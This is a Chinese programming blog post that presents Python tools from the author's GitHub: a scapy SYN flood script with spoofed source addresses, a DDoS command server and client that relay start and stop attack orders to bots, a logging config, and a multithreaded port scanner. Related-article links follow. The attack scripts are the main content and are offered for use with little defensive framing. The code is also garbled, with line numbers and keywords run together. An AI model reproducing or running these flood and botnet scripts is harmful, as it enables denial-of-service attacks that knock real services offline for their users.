python ddos 检测系统_python实现端口扫描器/DoS/DDoS

最新推荐文章于 2024-05-01 09:26:05 发布
最新推荐文章于 2024-05-01 09:26:05 发布
阅读量598 收藏 1
点赞数 1
文章标签: python ddos 检测系统

整理github,梳理下Python小工具。以下是python实现的DoS/DDoS/端口扫描器(github)。

一、DoS

SYN Flood是当前最流行的DoS(拒绝服务攻击)与DdoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。参考链接:https://baike.so.com/doc/5503756-5739500.html

利用python的scapy库可以很容易的实现DoS攻击。简单来说,scapy就是模拟客户端TCP链接的第一次握手,发送携带syn的数据包给服务端。当服务端返回syn+ack应答时,正常的客户端应该发送携带ack的响应以完成3次握手。而不正常的客户端不再响应,当有数以万记的这样的客户端时,服务器会维护一个非常大的半连接列表而消耗非常大的资源。最后导致堆栈溢出,或是服务端失去响应。

scapy库可以很容易的模拟不同的src来发起连接,所有脚本需要在root下执行。

1 #!/usr/bin/env python3

2 importrandom3 from scapy.all import *

4

5 defsynFlood(target, dPort):6 srcList = ['201.1.1.2','10.1.1.12','69.1.1.2','125.130.5.199']7 for sPort in range(1025,65535):8 index = random.randrange(4)9 ipLayer = IP(src=srcList[index],dst=target)10 tcpLayer = TCP(sport=sPort,dport=dPort,flags='S')11 packet = ipLayer/tcpLayer12 send(packet)

二、DDoS

DDoS相比DoS,不再是一个客户端发起攻击,而是由一台服务器通过socket与多台客户端建立连接,当服务器下发攻击命令时,所有客户端一起向目标机器发起攻击。

1)server部分

服务端首先需要创建socket,绑定端口和网络地址。同时开辟一个线程来建立连接,当有新的连接建立时,把连接实例存放到一个列表中。发送命令时,遍历列表,向每个socket实例发送命令。

1 #-*- coding:utf-8 -*-

2 #!/usr/bin/env python3

3

4 importsocket5 importargparse6 from threading importThread7 importlogging8 importlogging.config9 logging.config.fileConfig("logger.conf")10 logger = logging.getLogger("serverLogger")11

12 socketList = []#成功建立连接的socket实例列表

13

14 defsendCmd(cmd):15 print('Send command...')16 for sock insocketList:17 sock.send(bytes(cmd,encoding='utf-8'))18

19

20 defwaitConnect(s):21 whileTrue:22 sock,addr = s.accept() #sock是已经建立连接的socket 实例

23 if sock not insocketList:24 socketList.append(sock)25

26

27 defmain():28 s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)29 s.bind(('0.0.0.0',58868))30 s.listen(1024)31 t = Thread(target=waitConnect,args=(s,))#开辟线程来建立连接

32 t.start()33

34 print('Wait at least a client connection')35 while notlen(socketList):36 pass

37

38 print('It has been a client connection')39

40 whileTrue:41 print('='*50)42 print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c "')43 cmd_str = input('Please input cmd:')44 iflen(cmd_str):45 if cmd_str[0]=='#':46 sendCmd(cmd_str)47 else:48 logging.error('error format!')49 logging.error(cmd_str)50

51

52 if __name__=='__main__':53 main()

2)client部分

client部分主要负责对服务端发送的命令进行解析(argparse模块)。如果命令格式正确,判断当前是否有攻击在执行,如果有,则停止攻击的进程,重新发起攻击;如果没有,则直接发起攻击。

1 #!/usr/bin/env python3

2 #-*- coding:utf-8 -*-

3

4 importsocket5 importsys6 importrandom7 importargparse8 from multiprocessing importProcess9 from scapy.all import *

10 importos11 importlogging12 importlogging.config13 logging.config.fileConfig("logger.conf")14 logger = logging.getLogger("clientLogger")15 isWorking =False16 curProcess =None17

18 #synFlood攻击

19 defsynFlood(target, dPort):20 print('='*100)21 print('The syn Flood is running!')22 logging.info('The syn Flood is running!')23 print('='*100)24 srcList=['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']25 for sPort in range(1025,65535):26 index = random.randrange(4)27 ipLayer = IP(src=srcList[index],dst=target)28 tcpLayer = TCP(sport=sPort,dport=dPort,flags='S')29 packet = ipLayer/tcpLayer30 send(packet)31

32

33 #处理命令

34 defcmdHandle(sock, parser):35 globalcurProcess36 whileTrue:37 data = sock.recv(1024).decode('utf-8')38 if len(data)==0:39 print('The data is empty!')40 logging.error('The data received is empty!')41 return

42 if data[0]=='#':43 try:44 options = parser.parse_args(data[1:].split())45 m_host =options.host46 m_port =options.port47 m_cmd =options.cmd48 if m_cmd.lower()=='start':49 if curProcess !=None andcurProcess.is_alive():50 curProcess.terminate()51 curProcess =None52 os.system('clear')53 logging.info('stop current process to prepare for new process.')54 print('The synFlood is start')55 logging.info('The synFlood is start')56 p = Process(target=synFlood,args=(m_host,int(m_port)))57 p.start()58 curProcess =p59 elif m_cmd.lower() == 'stop':60 if curProcess !=None andcurProcess.is_alive():61 curProcess.terminate()62 os.system('clear')63 logging.info('stop current process.')64 except(Exception) as e:65 print(e)66 print('Failed to perform the command!')67 logging.error('command format error.')68

69

70 defmain():71 p =argparse.ArgumentParser()72 p.add_argument('-H', dest='host',type=str)73 p.add_argument('-p', dest='port',type=str)74 p.add_argument('-c', dest='cmd', type=str)75 print('*'*40)76 try:77 s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)78 s.connect(('127.0.0.1',58868))79 print('To connected server was success!')80 print('='*40)81 cmdHandle(s,p)82 except(Exception) as e:83 print(e)84 logging.error(e)85 print('The network connected failed!')86 print('Please restart the script')87 sys.exit(0)88

89

90 if __name__=='__main__':91 main()

3)日志记录

这里使用Python的logging模块进行记录。存在一个bug,不知道有同学能帮忙看出问题在哪里么?Client模块和Server模块使用了不同的logger,预期分别记录到Client.log和Server.log中。但结果全部都会记录到Server.log中。

logger.conf设置如下:

1 ###############

2 [loggers]3 keys =root,serverLogger,clientLogger4

5 [logger_root]6 handlers =serverHandler7 level =DEBUG8

9 [logger_serverLogger]10 handlers =serverHandler11 qualname =serverLogger12 propagate =013

14 [logger_clientLogger]15 handlers =clientHandler16 qualname =clientLogger17 propagate =018

19 ####################

20 [handlers]21 keys =serverHandler,clientHandler22

23 [handler_serverHandler]24 class =FileHandler25 level =DEBUG26 formatter =serverFormatter27 args = ("logs/Server.log","a")28

29 [handler_clientHandler]30 class =FileHandler31 level =DEBUG32 formatter =clientFormatter33 args = ("logs/Client.log","a")34

35 #################

36 [formatters]37 keys =serverFormatter,clientFormatter38

39 [formatter_serverFormatter]40 format=%(asctime)s %(filename)s [line:%(lineno)d] %(levelname)s %(message)s41 datefmt = %d %b %Y %H:%M:%S42

43 [formatter_clientFormatter]44 format=%(asctime)s %(filename)s [line:%(lineno)d] %(levelname)s %(message)s45 datefmt = %d %b %Y %H:%M:%S

三、端口扫描器

端口扫描是指客户端向一定范围内的服务器端口发送对应请求,以此确认可使用的端口。常被计算机管理员用于确认安全策略,同时被攻击者用于识别目标主机上可运行的服务。

这里使用socket建立对待扫描的端口,建立完成的TCP连接。如果能够建立,说明端口是开放的。判断完毕后关闭连接。使用多线程来执行每一个TCP连接:

1 #!/usr/bin/env python3

2

3 importsys4 import_thread5 from socket import *

6

7 deftcp_test(port):8 sock =socket(AF_INET,SOCK_STREAM)9 sock.settimeout(10)10 result =sock.connect_ex((target_ip, port))11 if result==0:12 lock.acquire()13 print("Opened Port:", port)14 lock.release()15

16 if __name__ == '__main__':17 #scanPort_multi_thread.py -

18 host = sys.argv[1]19 portstrs = sys.argv[2].split('-')20 start_port =int(portstrs[0])21 end_port = int(portstrs[1])22 target_ip =gethostbyname(host)23 lock =_thread.allocate_lock()24

25 for port inrange(start_port, end_port):26 _thread.start_new_thread(tcp_test, (port,))

weixin_39966130
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用python代码,拦截ddos攻击
第一天
08-21 4823
最近公司的服务受到了大量的请求攻击,对方不断的请求访问的web网站。占用服务宽带,导致普通用户无法访问。 头痛,于是研究了一天,利用python写了一个脚本,通过nginx访问日志提取大量请求的ip,然后加入黑名单,禁止访问。 具体代码如下: 代码还有很多优化的地方,后续慢慢优化,基本功能已经实现。 # -*- coding: utf-8 -*- import os import si...
Python检测和防御DOS攻击
qq_45616828的博客
11-10 2883
P80
2024年Python最新python网络渗透之:DOS攻击篇_ddos攻击脚本(1)
最新发布
2401_84584854的博客
05-01 611
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
python ddos 检测系统_pythonDDOS攻击脚本
weixin_39732991的博客
02-09 661
本文实例为大家分享了pythonDDOS攻击脚本,供大家参考,具体内容如下于是就找到了我之前收藏的一篇python的文章,是关于ddos攻击的一个脚本,正好今天有空,就实践下了。附上源码pyDdos.py:#!/usr/bin/env pythonimport socketimport timeimport threading#Pressure Test,ddos tool#----------...
DDOS攻击检测和防护
热门推荐
linking530的专栏
05-18 1万+
一、 当前DDOS的主要特点 DDOS攻击作为常见的高危害性安全威胁,一直是CIO们的心头大患。和一般的安全风险不同,现阶段的DDOS攻击呈现出了下面3个特点: 攻击门槛低。简单易操作导致攻击很活跃。结合各方统计数据可以看出,现阶段的DDOS攻击活动还处在一个高发期,无论是在持续增长的大小、速度、持续时间和复杂性上,都有了比较明显的增长。一方面,网络上充斥的各种DDOS攻击工具及详细的指导教程
python实现ddos防护_python实现的防DDoS脚本
weixin_33668386的博客
02-20 1032
这篇博可以说连开场白都可以省掉了,之所以被DDoS,并不是因为惹了疯狗被追着咬,而是因为VC悲剧之后流量全到simplecd来了。不仅如此,一些笨蛋们在抓站,一些笨蛋们在用迅雷下载,100Mbps的端口居然已经满负荷运作十几个小时了,这是什么概念?100Mbps满负荷1天,流量就是1000G,这样下去不用多久,我就可以等着上百刀的罚单了,泪飙。此外,100Mbps的速度使得硬盘都快转不动了,严重拖...
port_Scanner:此端口扫描程序将检查某些IP地址上是否有打开的端口
02-17
7. **性能优化**:为了不影响网络服务,端口扫描需要控制扫描速率,避免被目标系统识别为DDoS攻击。可以通过设置延迟时间或者使用信号量来控制并发度,以实现更友好的扫描行为。 8. **安全性与道德规范**:进行...
violent-python:有关渗透测试,Web,网络和无线设备利用的脚本和代码示例
05-11
前两章包含用于执行以下操作的脚本: 字典攻击蛮力密码哈希比较打开安全的zip文件端口扫描SSH僵尸网络FTP攻击复制Conficker攻击第三章和第四章对人员进行地理定位,并提取应用程序中的元数据。 使用IP和图像对...
traffic_detect
04-21
4. 异常检测:可能会包含一些算法或规则,用于检测可能的攻击行为,如DDoS攻击、端口扫描、非法协议使用等。 5. 日志记录和报告:将检测结果记录到日志文件中,或者生成可视化报告,便于用户理解和处理问题。 6. ...
CallStranger:Callstranger的漏洞检查(CVE-2020-12695)
03-08
攻击者可以使用此漏洞进行以下操作: 绕过DLP渗出数据使用数百万个面向Internet的UPnP设备作为放大的反射TCP DDoS / SYN Flood的源从面向Internet的UPnP设备扫描内部端口此脚本仅模拟数据渗透。 您可以在 上找到...
fuzzdb-collect:网络上安全资源的搜集
05-16
Scanners Box是一个集合github平台上的安全行业从业者自研开源扫描的仓库,包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描或模块化扫描,同时该仓库只收录各位...
防御DDoS攻击的实时监测模型
03-26 3244
拒绝服务攻击(DoS)和分布式拒绝服务攻击(DDoS)已经成为网络安全最大的威胁之一,如何防御DDoS攻击是当前人们关注的热点。然而目前的防御机制几乎没有实现DDoS攻击的实时监测。阐述了一种基于径向基函数的神经网络的实时监测模型,能够实时监测出DDoS攻击,不用增加网络流量,而且可以监测出目前所存在的所有类型的DDoS攻击。1、前言  随着Internet的应用越来越广泛,随之而来的网络安全问题
python如何编写ddos_Python编写渗透工具学习笔记二 | 0x04编写程序分析流量检测ddos攻击...
weixin_39661345的博客
11-24 386
0x04编写程序分析流量检测ddos攻击1使用dpkt发现下载loic的行为LOIC,即Low Orbit Ion Cannon低轨道离子炮,是用于压力测试的工具,通常被攻击者用来实现DDoS攻击。我们要编写py脚本来解析http流量,并检查其中有无通过http get获取压缩过的loic二进制可执行文件的情况。为了检查http流量,我们必须先把数据包的以太网部分、ip层以及tcp层部分分解出来,...
PythonDDos
w666ssyyjj的博客
01-31 952
ddosDDOS
Python实现DDos攻击实例详解
2301_80240808的博客
11-27 2946
SYN泛洪攻击是一种比较常用的Dos方式之一。通过发送大量伪造的 TCP 连接请求,使被攻击主机资源耗尽(通常是 CPU 满负荷或内存不足)的攻击方式。我们都知道建立 TCP 连接需要三次握手。正常情况下客户端首先向服务端发送SYN报文,随后服务端返回以SYN+ACK报文,最后客户端向服务端发送ACK报文完成三次握手
pythonDDOS攻击
吃不胖.
09-24 404
攻击者发送的SYN报文通常是伪造的,其源IP地址被设置为虚假的IP地址,从而使受害者无法正确地响应连接请求,产生大量的半开连接状态,最终导致目标系统资源耗尽。针对不同的DDOS攻击方式,采取不同的防御措施。UDP协议是一种无连接的协议,没有连接建立和断开的过程,因此攻击者可以在短时间内向目标主机连续发送大量的UDP包,导致目标主机的带宽、CPU等资源疲于应付,最终导致服务拒绝。DDOS攻击对目标系统的危害非常大,不仅会造成服务的中断和降低网站的性能,还可能导致重要数据的泄露和系统的崩溃。
全网最全系统学习爬虫教程,用爬虫进行数据分析(bs4,xpath,正则表达式)
m0_59164304的博客
05-25 2215
1.bs4解析基础 2.bs4案例 3.xpath解析基础 4.xpath解析案例-4k图片解析爬取 5.xpath解析案例-58二手房 6.xpath解析案例-爬取站长素材中免费简历模板 7.xpath解析案例-全国城市名称爬取 8.正则解析 9.正则解析-分页爬取 10.爬取图片 1.bs4解析基础 from bs4 import BeautifulSoup fp = open('第三章 数据分析/text.html','r',encoding='utf-8') soup = BeautifulSo
使用Scapy愚弄入侵检测系统
zwlww1的博客
01-18 631
#!/usr/bin/python #coding=utf-8 import optparse from scapy.all import * from random import randint # 触发DDoS警报 def ddosTest(src, dst, iface, count): pkt = IP(src=src, dst=dst) / ICMP(type=8, id=67
chatgpt赋能Python-pythonddos
www_xuhss_com的博客
05-21 542
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
Python项目开发实战_端口扫描实现_编程案例解析实例详解课程教程.pdf
05-02
"本资源是一份关于Python项目开发实战的教程,主要讲解如何利用Python实现一个端口扫描。教程涵盖了端口扫描的原理、用途,以及Python编程基础,包括模块导入、位运算、套接字操作和多线程技术。通过实际的项目...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值